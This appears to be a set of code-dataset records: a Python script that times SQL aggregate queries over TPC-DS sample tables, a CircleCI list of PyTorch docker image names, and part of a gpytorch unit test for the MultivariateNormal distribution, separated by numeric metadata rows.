"select avg(ss_ext_discount_amt) from tpcds40g_storesales_10k_ss_ext_discount_amt_ss_quantity where ss_quantity between 41 and 60",
"select avg(ss_ext_discount_amt) from tpcds40g_storesales_10k_ss_ext_discount_amt_ss_quantity where ss_quantity between 61 and 80",
"select avg(ss_ext_discount_amt) from tpcds40g_storesales_10k_ss_ext_discount_amt_ss_quantity where ss_quantity between 81 and 100",
"select avg(ss_ext_sales_price) from tpcds40g_storesales_10k_ss_ext_sales_price_ss_quantity where ss_quantity between 1 and 20",
"select avg(ss_ext_sales_price) from tpcds40g_storesales_10k_ss_ext_sales_price_ss_quantity where ss_quantity between 21 and 40",
"select avg(ss_ext_sales_price) from tpcds40g_storesales_10k_ss_ext_sales_price_ss_quantity where ss_quantity between 41 and 60",
"select avg(ss_ext_sales_price) from tpcds40g_storesales_10k_ss_ext_sales_price_ss_quantity where ss_quantity between 61 and 80",
"select avg(ss_ext_sales_price) from tpcds40g_storesales_10k_ss_ext_sales_price_ss_quantity where ss_quantity between 81 and 100",
"select avg(ss_ext_list_price) from tpcds40g_storesales_10k_ss_ext_list_price_ss_quantity where ss_quantity between 1 and 20",
"select avg(ss_ext_list_price) from tpcds40g_storesales_10k_ss_ext_list_price_ss_quantity where ss_quantity between 21 and 40",
"select avg(ss_ext_list_price) from tpcds40g_storesales_10k_ss_ext_list_price_ss_quantity where ss_quantity between 41 and 60",
"select avg(ss_ext_list_price) from tpcds40g_storesales_10k_ss_ext_list_price_ss_quantity where ss_quantity between 61 and 80",
"select avg(ss_ext_list_price) from tpcds40g_storesales_10k_ss_ext_list_price_ss_quantity where ss_quantity between 81 and 100",
"select avg(ss_ext_tax) from tpcds40g_storesales_10k_ss_ext_tax_ss_quantity where ss_quantity between 1 and 20",
"select avg(ss_ext_tax) from tpcds40g_storesales_10k_ss_ext_tax_ss_quantity where ss_quantity between 21 and 40",
"select avg(ss_ext_tax) from tpcds40g_storesales_10k_ss_ext_tax_ss_quantity where ss_quantity between 41 and 60",
"select avg(ss_ext_tax) from tpcds40g_storesales_10k_ss_ext_tax_ss_quantity where ss_quantity between 61 and 80",
"select avg(ss_ext_tax) from tpcds40g_storesales_10k_ss_ext_tax_ss_quantity where ss_quantity between 81 and 100",
"select avg(ss_net_paid) from tpcds40g_storesales_10k_ss_net_paid_ss_quantity where ss_quantity between 1 and 20",
"select avg(ss_net_paid) from tpcds40g_storesales_10k_ss_net_paid_ss_quantity where ss_quantity between 21 and 40",
"select avg(ss_net_paid) from tpcds40g_storesales_10k_ss_net_paid_ss_quantity where ss_quantity between 41 and 60",
"select avg(ss_net_paid) from tpcds40g_storesales_10k_ss_net_paid_ss_quantity where ss_quantity between 61 and 80",
"select avg(ss_net_paid) from tpcds40g_storesales_10k_ss_net_paid_ss_quantity where ss_quantity between 81 and 100",
"select avg(ss_net_paid_inc_tax) from tpcds40g_storesales_10k_ss_net_paid_inc_tax_ss_quantity where ss_quantity between 1 and 20",
"select avg(ss_net_paid_inc_tax) from tpcds40g_storesales_10k_ss_net_paid_inc_tax_ss_quantity where ss_quantity between 21 and 40",
"select avg(ss_net_paid_inc_tax) from tpcds40g_storesales_10k_ss_net_paid_inc_tax_ss_quantity where ss_quantity between 41 and 60",
"select avg(ss_net_paid_inc_tax) from tpcds40g_storesales_10k_ss_net_paid_inc_tax_ss_quantity where ss_quantity between 61 and 80",
"select avg(ss_net_paid_inc_tax) from tpcds40g_storesales_10k_ss_net_paid_inc_tax_ss_quantity where ss_quantity between 81 and 100",
"select avg(ss_net_profit) from tpcds40g_storesales_10k_ss_net_profit_ss_quantity where ss_quantity between 1 and 20",
"select avg(ss_net_profit) from tpcds40g_storesales_10k_ss_net_profit_ss_quantity where ss_quantity between 21 and 40",
"select avg(ss_net_profit) from tpcds40g_storesales_10k_ss_net_profit_ss_quantity where ss_quantity between 41 and 60",
"select avg(ss_net_profit) from tpcds40g_storesales_10k_ss_net_profit_ss_quantity where ss_quantity between 61 and 80",
"select avg(ss_net_profit) from tpcds40g_storesales_10k_ss_net_profit_ss_quantity where ss_quantity between 81 and 100",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_quantity where ss_quantity between 0 and 5",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_quantity where ss_quantity between 6 and 10",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_quantity where ss_quantity between 11 and 15",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_quantity where ss_quantity between 16 and 20",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_quantity where ss_quantity between 21 and 25",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_quantity where ss_quantity between 26 and 30",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_list_price where ss_list_price between 90 and 100",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_list_price where ss_list_price between 70 and 80",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_list_price where ss_list_price between 80 and 90",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_list_price where ss_list_price between 100 and 110",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_list_price where ss_list_price between 110 and 120",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_list_price where ss_list_price between 120 and 130",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 7000 and 8000",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 8000 and 9000",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 9000 and 10000",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 10000 and 11000",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 11000 and 12000",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 12000 and 13000",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 10 and 30",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 20 and 40",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 30 and 50",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 40 and 60",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 50 and 70",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 60 and 80",
"select avg(ws_quantity) from tpcds40g_websales_10k_ws_quantity_ws_sales_price where ws_sales_price between 100.00 and 150.00",
"select avg(ws_quantity) from tpcds40g_websales_10k_ws_quantity_ws_sales_price where ws_sales_price between 50.00 and 100.00",
"select avg(ws_quantity) from tpcds40g_websales_10k_ws_quantity_ws_sales_price where ws_sales_price between 150.00 and 200.00",
    ]
    # counts
    pres = []
    ts = []
    for query in counts:
        # print(query)
        p, t = sqlExecutor.execute(query)
        pres.append(p)
        ts.append(t)
    print("counts", pres)
    print("time", ts)
    # sums
    pres = []
    ts = []
    for query in sums:
        p, t = sqlExecutor.execute(query)
        pres.append(p)
        ts.append(t)
    print("sums", pres)
    print("time", ts)
    # avgs
    pres = []
    ts = []
    for query in avgs:
        p, t = sqlExecutor.execute(query)
        pres.append(p)
        ts.append(t)
    print("avgs", pres)
    print("time", ts)
def run_100k(sqlExecutor):
    # The same workload, run against the 100k-row uniform sample tables.
    sums = [
"select sum(ss_quantity) from tpcds40g_storesales_100k_ss_quantity_ss_sales_price where ss_sales_price between 50.00 and 100.00",
"select sum(ss_quantity) from tpcds40g_storesales_100k_ss_quantity_ss_sales_price where ss_sales_price between 100.00 and 150.00",
"select sum(ss_quantity) from tpcds40g_storesales_100k_ss_quantity_ss_sales_price where ss_sales_price between 150.00 and 200.00",
"select sum(ss_quantity) from tpcds40g_storesales_100k_ss_quantity_ss_net_profit where ss_net_profit between 0 and 2000",
"select sum(ss_quantity) from tpcds40g_storesales_100k_ss_quantity_ss_net_profit where ss_net_profit between 150 and 3000",
"select sum(ss_quantity) from tpcds40g_storesales_100k_ss_quantity_ss_net_profit where ss_net_profit between 50 and 25000", ]
    counts = [
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_quantity where ss_quantity between 1 and 20",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_quantity where ss_quantity between 21 and 40",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_quantity where ss_quantity between 41 and 60",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_quantity where ss_quantity between 61 and 80",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_quantity where ss_quantity between 81 and 100",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_quantity where ss_quantity between 0 and 5",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_quantity where ss_quantity between 6 and 10",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_quantity where ss_quantity between 11 and 15",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_quantity where ss_quantity between 16 and 20",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_quantity where ss_quantity between 21 and 25",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_quantity where ss_quantity between 26 and 30",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_list_price where ss_list_price between 90 and 100",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_list_price where ss_list_price between 70 and 80",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_list_price where ss_list_price between 80 and 90",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_list_price where ss_list_price between 100 and 110",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_list_price where ss_list_price between 110 and 120",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_list_price where ss_list_price between 120 and 130",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 7000 and 8000",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 8000 and 9000",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 9000 and 10000",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 10000 and 11000",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 11000 and 12000",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 12000 and 13000",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 10 and 30",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 20 and 40",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 30 and 50",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 40 and 60",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 50 and 70",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 60 and 80",
    ]
    avgs = [
"select avg(ss_ext_discount_amt) from tpcds40g_storesales_100k_ss_ext_discount_amt_ss_quantity where ss_quantity between 1 and 20",
"select avg(ss_ext_discount_amt) from tpcds40g_storesales_100k_ss_ext_discount_amt_ss_quantity where ss_quantity between 21 and 40",
"select avg(ss_ext_discount_amt) from tpcds40g_storesales_100k_ss_ext_discount_amt_ss_quantity where ss_quantity between 41 and 60",
"select avg(ss_ext_discount_amt) from tpcds40g_storesales_100k_ss_ext_discount_amt_ss_quantity where ss_quantity between 61 and 80",
"select avg(ss_ext_discount_amt) from tpcds40g_storesales_100k_ss_ext_discount_amt_ss_quantity where ss_quantity between 81 and 100",
"select avg(ss_ext_sales_price) from tpcds40g_storesales_100k_ss_ext_sales_price_ss_quantity where ss_quantity between 1 and 20",
"select avg(ss_ext_sales_price) from tpcds40g_storesales_100k_ss_ext_sales_price_ss_quantity where ss_quantity between 21 and 40",
"select avg(ss_ext_sales_price) from tpcds40g_storesales_100k_ss_ext_sales_price_ss_quantity where ss_quantity between 41 and 60",
"select avg(ss_ext_sales_price) from tpcds40g_storesales_100k_ss_ext_sales_price_ss_quantity where ss_quantity between 61 and 80",
"select avg(ss_ext_sales_price) from tpcds40g_storesales_100k_ss_ext_sales_price_ss_quantity where ss_quantity between 81 and 100",
"select avg(ss_ext_list_price) from tpcds40g_storesales_100k_ss_ext_list_price_ss_quantity where ss_quantity between 1 and 20",
"select avg(ss_ext_list_price) from tpcds40g_storesales_100k_ss_ext_list_price_ss_quantity where ss_quantity between 21 and 40",
"select avg(ss_ext_list_price) from tpcds40g_storesales_100k_ss_ext_list_price_ss_quantity where ss_quantity between 41 and 60",
"select avg(ss_ext_list_price) from tpcds40g_storesales_100k_ss_ext_list_price_ss_quantity where ss_quantity between 61 and 80",
"select avg(ss_ext_list_price) from tpcds40g_storesales_100k_ss_ext_list_price_ss_quantity where ss_quantity between 81 and 100",
"select avg(ss_ext_tax) from tpcds40g_storesales_100k_ss_ext_tax_ss_quantity where ss_quantity between 1 and 20",
"select avg(ss_ext_tax) from tpcds40g_storesales_100k_ss_ext_tax_ss_quantity where ss_quantity between 21 and 40",
"select avg(ss_ext_tax) from tpcds40g_storesales_100k_ss_ext_tax_ss_quantity where ss_quantity between 41 and 60",
"select avg(ss_ext_tax) from tpcds40g_storesales_100k_ss_ext_tax_ss_quantity where ss_quantity between 61 and 80",
"select avg(ss_ext_tax) from tpcds40g_storesales_100k_ss_ext_tax_ss_quantity where ss_quantity between 81 and 100",
"select avg(ss_net_paid) from tpcds40g_storesales_100k_ss_net_paid_ss_quantity where ss_quantity between 1 and 20",
"select avg(ss_net_paid) from tpcds40g_storesales_100k_ss_net_paid_ss_quantity where ss_quantity between 21 and 40",
"select avg(ss_net_paid) from tpcds40g_storesales_100k_ss_net_paid_ss_quantity where ss_quantity between 41 and 60",
"select avg(ss_net_paid) from tpcds40g_storesales_100k_ss_net_paid_ss_quantity where ss_quantity between 61 and 80",
"select avg(ss_net_paid) from tpcds40g_storesales_100k_ss_net_paid_ss_quantity where ss_quantity between 81 and 100",
"select avg(ss_net_paid_inc_tax) from tpcds40g_storesales_100k_ss_net_paid_inc_tax_ss_quantity where ss_quantity between 1 and 20",
"select avg(ss_net_paid_inc_tax) from tpcds40g_storesales_100k_ss_net_paid_inc_tax_ss_quantity where ss_quantity between 21 and 40",
"select avg(ss_net_paid_inc_tax) from tpcds40g_storesales_100k_ss_net_paid_inc_tax_ss_quantity where ss_quantity between 41 and 60",
"select avg(ss_net_paid_inc_tax) from tpcds40g_storesales_100k_ss_net_paid_inc_tax_ss_quantity where ss_quantity between 61 and 80",
"select avg(ss_net_paid_inc_tax) from tpcds40g_storesales_100k_ss_net_paid_inc_tax_ss_quantity where ss_quantity between 81 and 100",
"select avg(ss_net_profit) from tpcds40g_storesales_100k_ss_net_profit_ss_quantity where ss_quantity between 1 and 20",
"select avg(ss_net_profit) from tpcds40g_storesales_100k_ss_net_profit_ss_quantity where ss_quantity between 21 and 40",
"select avg(ss_net_profit) from tpcds40g_storesales_100k_ss_net_profit_ss_quantity where ss_quantity between 41 and 60",
"select avg(ss_net_profit) from tpcds40g_storesales_100k_ss_net_profit_ss_quantity where ss_quantity between 61 and 80",
"select avg(ss_net_profit) from tpcds40g_storesales_100k_ss_net_profit_ss_quantity where ss_quantity between 81 and 100",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_quantity where ss_quantity between 0 and 5",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_quantity where ss_quantity between 6 and 10",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_quantity where ss_quantity between 11 and 15",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_quantity where ss_quantity between 16 and 20",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_quantity where ss_quantity between 21 and 25",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_quantity where ss_quantity between 26 and 30",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_list_price where ss_list_price between 90 and 100",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_list_price where ss_list_price between 70 and 80",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_list_price where ss_list_price between 80 and 90",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_list_price where ss_list_price between 100 and 110",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_list_price where ss_list_price between 110 and 120",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_list_price where ss_list_price between 120 and 130",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 7000 and 8000",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 8000 and 9000",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 9000 and 10000",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 10000 and 11000",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 11000 and 12000",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 12000 and 13000",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 10 and 30",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 20 and 40",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 30 and 50",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 40 and 60",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 50 and 70",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 60 and 80",
"select avg(ws_quantity) from tpcds40g_websales_100k_ws_quantity_ws_sales_price where ws_sales_price between 100.00 and 150.00",
"select avg(ws_quantity) from tpcds40g_websales_100k_ws_quantity_ws_sales_price where ws_sales_price between 50.00 and 100.00",
"select avg(ws_quantity) from tpcds40g_websales_100k_ws_quantity_ws_sales_price where ws_sales_price between 150.00 and 200.00",
    ]
    # counts
    pres = []
    ts = []
    for query in counts:
        p, t = sqlExecutor.execute(query)
        pres.append(p)
        ts.append(t)
    print("counts", pres)
    print("time", ts)
    # sums
    pres = []
    ts = []
    for query in sums:
        p, t = sqlExecutor.execute(query)
        pres.append(p)
        ts.append(t)
    print("sums", pres)
    print("time", ts)
    # avgs
    pres = []
    ts = []
    for query in avgs:
        p, t = sqlExecutor.execute(query)
        pres.append(p)
        ts.append(t)
    print("avgs", pres)
    print("time", ts)
if __name__ == "__main__":
    run()
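# run() itself is not shown in this excerpt; presumably it is defined earlier
# in the script and builds the sample tables above before invoking run_10k()
# and run_100k() with a configured sqlExecutor.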
| 99.958225
| 190
| 0.764157
| 5,876
| 38,284
| 4.497617
| 0.025187
| 0.10557
| 0.116959
| 0.128727
| 0.980324
| 0.97847
| 0.976427
| 0.976427
| 0.976162
| 0.975026
| 0
| 0.073401
| 0.187572
| 38,284
| 382
| 191
| 100.219895
| 0.776292
| 0.02262
| 0
| 0.284866
| 0
| 0.083086
| 0.85806
| 0.405658
| 0
| 0
| 0
| 0
| 0
| 1
| 0.011869
| false
| 0
| 0.002967
| 0
| 0.014837
| 0.035608
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
4ac66bc7f9e41dc14dc5596af385e503cbba9e57
| 1,557
|
py
|
Python
|
.circleci/cimodel/data/simple/docker_definitions.py
|
wenhaopeter/read_pytorch_code
|
491f989cd918cf08874dd4f671fb7f0142a0bc4f
|
[
"Intel",
"X11"
] | null | null | null |
.circleci/cimodel/data/simple/docker_definitions.py
|
wenhaopeter/read_pytorch_code
|
491f989cd918cf08874dd4f671fb7f0142a0bc4f
|
[
"Intel",
"X11"
] | null | null | null |
.circleci/cimodel/data/simple/docker_definitions.py
|
wenhaopeter/read_pytorch_code
|
491f989cd918cf08874dd4f671fb7f0142a0bc4f
|
[
"Intel",
"X11"
] | null | null | null |
from collections import OrderedDict
from cimodel.lib.miniutils import quote
# TODO: make this generated from a matrix rather than just a static list
IMAGE_NAMES = [
"pytorch-linux-bionic-cuda11.0-cudnn8-py3.6-gcc9",
"pytorch-linux-bionic-cuda11.0-cudnn8-py3.8-gcc9",
"pytorch-linux-bionic-cuda10.2-cudnn7-py3.8-gcc9",
"pytorch-linux-bionic-py3.6-clang9",
"pytorch-linux-bionic-cuda10.2-cudnn7-py3.6-clang9",
"pytorch-linux-bionic-py3.8-gcc9",
"pytorch-linux-xenial-cuda10-cudnn7-py3-gcc7",
"pytorch-linux-xenial-cuda10.1-cudnn7-py3-gcc7",
"pytorch-linux-xenial-cuda10.2-cudnn7-py3-gcc7",
"pytorch-linux-xenial-cuda11.0-cudnn8-py3-gcc7",
"pytorch-linux-xenial-cuda9.2-cudnn7-py3-gcc5.4",
"pytorch-linux-xenial-cuda9.2-cudnn7-py3-gcc7",
"pytorch-linux-xenial-py3-clang5-android-ndk-r19c",
"pytorch-linux-xenial-py3-clang5-asan",
"pytorch-linux-xenial-py3.8",
"pytorch-linux-xenial-py3.6-clang7",
"pytorch-linux-xenial-py3.6-gcc4.8",
"pytorch-linux-xenial-py3.6-gcc5.4",
"pytorch-linux-xenial-py3.6-gcc7.2",
"pytorch-linux-xenial-py3.6-gcc7",
"pytorch-linux-xenial-pynightly",
"pytorch-linux-xenial-rocm3.3-py3.6",
]
def get_workflow_jobs():
    """Generates a list of docker image build definitions"""
    return [
        OrderedDict(
            {
                "docker_build_job": OrderedDict(
                    {"name": quote(image_name), "image_name": quote(image_name)}
                )
            }
        )
        for image_name in IMAGE_NAMES
    ]
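# For illustration (not part of the original file): each generated entry is a
# nested OrderedDict describing one CircleCI docker-image build job, roughly
#   {"docker_build_job": {"name": quote("pytorch-linux-bionic-py3.8-gcc9"),
#                         "image_name": quote("pytorch-linux-bionic-py3.8-gcc9")}}
# with the quoting applied by cimodel.lib.miniutils.quote.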
| 34.6
| 80
| 0.663455
| 217
| 1,557
| 4.714286
| 0.299539
| 0.258065
| 0.281525
| 0.164223
| 0.572825
| 0.479961
| 0.322581
| 0
| 0
| 0
| 0
| 0.076803
| 0.180475
| 1,557
| 44
| 81
| 35.386364
| 0.724922
| 0.078356
| 0
| 0
| 1
| 0
| 0.622113
| 0.60112
| 0
| 0
| 0
| 0.022727
| 0
| 1
| 0.027027
| false
| 0
| 0.054054
| 0
| 0.108108
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
435ca8be44a185d26d6f4c847581bd921b49022f
| 11,191
|
py
|
Python
|
test/distributions/test_multivariate_normal.py
|
konstantinklemmer/gpytorch
|
f1d947b340a188c398b6c6e610b6a839c61aa298
|
[
"MIT"
] | 2
|
2019-03-31T04:36:30.000Z
|
2019-05-22T20:09:25.000Z
|
test/distributions/test_multivariate_normal.py
|
konstantinklemmer/gpytorch
|
f1d947b340a188c398b6c6e610b6a839c61aa298
|
[
"MIT"
] | null | null | null |
test/distributions/test_multivariate_normal.py
|
konstantinklemmer/gpytorch
|
f1d947b340a188c398b6c6e610b6a839c61aa298
|
[
"MIT"
] | 1
|
2019-02-15T17:05:42.000Z
|
2019-02-15T17:05:42.000Z
|
from __future__ import absolute_import, division, print_function, unicode_literals
import unittest
import torch
from gpytorch.distributions import MultivariateNormal
from gpytorch.lazy import LazyTensor, NonLazyTensor
from test._utils import approx_equal
class TestMultivariateNormal(unittest.TestCase):
    def test_multivariate_normal_non_lazy(self, cuda=False):
        device = torch.device("cuda") if cuda else torch.device("cpu")
        mean = torch.tensor([0, 1, 2], dtype=torch.float, device=device)
        covmat = torch.diag(torch.tensor([1, 0.75, 1.5], device=device))
        mvn = MultivariateNormal(mean=mean, covariance_matrix=covmat, validate_args=True)
        self.assertTrue(torch.is_tensor(mvn.covariance_matrix))
        self.assertIsInstance(mvn.lazy_covariance_matrix, LazyTensor)
        self.assertTrue(approx_equal(mvn.variance, torch.diag(covmat)))
        self.assertTrue(approx_equal(mvn.scale_tril, covmat.sqrt()))
        mvn_plus1 = mvn + 1
        self.assertTrue(torch.equal(mvn_plus1.mean, mvn.mean + 1))
        self.assertTrue(torch.equal(mvn_plus1.covariance_matrix, mvn.covariance_matrix))
        mvn_times2 = mvn * 2
        self.assertTrue(torch.equal(mvn_times2.mean, mvn.mean * 2))
        self.assertTrue(torch.equal(mvn_times2.covariance_matrix, mvn.covariance_matrix * 4))
        mvn_divby2 = mvn / 2
        self.assertTrue(torch.equal(mvn_divby2.mean, mvn.mean / 2))
        self.assertTrue(torch.equal(mvn_divby2.covariance_matrix, mvn.covariance_matrix / 4))
        self.assertAlmostEqual(mvn.entropy().item(), 4.3157, places=4)
        self.assertAlmostEqual(mvn.log_prob(torch.zeros(3, device=device)).item(), -4.8157, places=4)
        logprob = mvn.log_prob(torch.zeros(2, 3, device=device))
        logprob_expected = torch.tensor([-4.8157, -4.8157], device=device)
        self.assertTrue(approx_equal(logprob, logprob_expected))
        conf_lower, conf_upper = mvn.confidence_region()
        self.assertTrue(approx_equal(conf_lower, mvn.mean - 2 * mvn.stddev))
        self.assertTrue(approx_equal(conf_upper, mvn.mean + 2 * mvn.stddev))
        self.assertTrue(mvn.sample().shape == torch.Size([3]))
        self.assertTrue(mvn.sample(torch.Size([2])).shape == torch.Size([2, 3]))
        self.assertTrue(mvn.sample(torch.Size([2, 4])).shape == torch.Size([2, 4, 3]))

    def test_multivariate_normal_non_lazy_cuda(self):
        if torch.cuda.is_available():
            self.test_multivariate_normal_non_lazy(cuda=True)

    def test_multivariate_normal_batch_non_lazy(self, cuda=False):
        device = torch.device("cuda") if cuda else torch.device("cpu")
        mean = torch.tensor([0, 1, 2], dtype=torch.float, device=device)
        covmat = torch.diag(torch.tensor([1, 0.75, 1.5], device=device))
        mvn = MultivariateNormal(mean=mean.repeat(2, 1), covariance_matrix=covmat.repeat(2, 1, 1), validate_args=True)
        self.assertTrue(torch.is_tensor(mvn.covariance_matrix))
        self.assertIsInstance(mvn.lazy_covariance_matrix, LazyTensor)
        self.assertTrue(approx_equal(mvn.variance, covmat.diag().repeat(2, 1)))
        self.assertTrue(approx_equal(mvn.scale_tril, torch.diag(covmat.diag().sqrt()).repeat(2, 1, 1)))
        mvn_plus1 = mvn + 1
        self.assertTrue(torch.equal(mvn_plus1.mean, mvn.mean + 1))
        self.assertTrue(torch.equal(mvn_plus1.covariance_matrix, mvn.covariance_matrix))
        mvn_times2 = mvn * 2
        self.assertTrue(torch.equal(mvn_times2.mean, mvn.mean * 2))
        self.assertTrue(torch.equal(mvn_times2.covariance_matrix, mvn.covariance_matrix * 4))
        mvn_divby2 = mvn / 2
        self.assertTrue(torch.equal(mvn_divby2.mean, mvn.mean / 2))
        self.assertTrue(torch.equal(mvn_divby2.covariance_matrix, mvn.covariance_matrix / 4))
        self.assertTrue(approx_equal(mvn.entropy(), 4.3157 * torch.ones(2, device=device)))
        logprob = mvn.log_prob(torch.zeros(2, 3, device=device))
        logprob_expected = -4.8157 * torch.ones(2, device=device)
        self.assertTrue(approx_equal(logprob, logprob_expected))
        logprob = mvn.log_prob(torch.zeros(2, 2, 3, device=device))
        logprob_expected = -4.8157 * torch.ones(2, 2, device=device)
        self.assertTrue(approx_equal(logprob, logprob_expected))
        conf_lower, conf_upper = mvn.confidence_region()
        self.assertTrue(approx_equal(conf_lower, mvn.mean - 2 * mvn.stddev))
        self.assertTrue(approx_equal(conf_upper, mvn.mean + 2 * mvn.stddev))
        self.assertTrue(mvn.sample().shape == torch.Size([2, 3]))
        self.assertTrue(mvn.sample(torch.Size([2])).shape == torch.Size([2, 2, 3]))
